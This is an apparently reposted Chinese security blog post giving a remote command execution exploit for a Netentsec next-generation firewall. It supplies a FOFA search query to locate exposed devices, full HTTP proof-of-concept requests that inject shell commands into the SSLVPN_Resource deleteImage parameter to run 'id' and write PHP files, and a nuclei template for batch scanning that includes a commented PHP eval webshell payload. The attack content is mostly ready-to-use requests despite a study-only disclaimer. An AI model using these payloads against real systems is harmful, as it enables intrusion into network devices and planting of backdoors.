*安信网*科技防火墙远程命令执行漏洞

2023年11月20日16:16:11评论60 views字数 2969阅读9分53秒阅读模式

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号望雪阁及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

*安信网*科技防火墙远程命令执行漏洞

三、资产梳理：

fofa: app="网康科技-下一代防火墙"

四、漏洞复现：

*安信网*科技防火墙远程命令执行漏洞

写入文件:

*安信网*科技防火墙远程命令执行漏洞

五、POC：

POST /directdata/direct/router HTTP/1.1Host: ipCookie: PHPSESSID=0luhut5imi4efh4fle1qdcram3; ys-active_page=s%3AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: https://123.234.82.26:11443/wuhu.txtContent-Type: application/x-www-form-urlencodedContent-Length: 160Origin: https://123.234.82.26:11443Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/wuhu.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

写入文件：

POST /directdata/direct/router HTTP/1.1Host: ipCookie: PHPSESSID=0luhut5imi4efh4fle1qdcram3; ys-active_page=s%3AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: https://123.234.82.26:11443/wuhu.txtContent-Type: application/x-www-form-urlencodedContent-Length: 183Origin: https://123.234.82.26:11443Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php phpinfo();?>' >/var/www/html/wuhu.php"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

nuclei批量检测

id: qianxin_wangkang_rceinfo:  name: qianxin_wangkang_rce  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/directdata/direct/router  metadata:    max-request: 1    fofa-query: app="网康科技-下一代防火墙"    verified: true  tags: qianxin_wangkang_rce,rce
requests:  - raw:      - |-        POST /directdata/direct/router HTTP/1.1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36        Host: {{Hostname}}
        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/wuhu.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}        #{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php @eval($_POST[6677]);?>' >/var/www/html/wuhu.php"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}              - |+        GET /wuhu.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    req-condition: true    matchers:      - type: dsl        condition: and        dsl:          - 'contains((body_2), "uid=") && status_code_2 == 200'

*安信网*科技防火墙远程命令执行漏洞

原文始发于微信公众号（fly的渗透学习笔记）：*安信网*科技防火墙远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

安信网科技防火墙远程命令执行漏洞

JSONP劫持漏洞

hackmyvm-family

对本校UTS的一次SQL注入渗透及分析

SpringBoot框架挖掘：从 actuator 到内网横向

团队内部漏洞挖掘-sql注入实战案例

某公司的渗透技能考核靶场通关记录

Vulhub-Thinkphp漏洞

vite 漏洞分析

内网基础-Cyberstrikelab靶场lab2

SRC挖掘之接口未授权访问

发表评论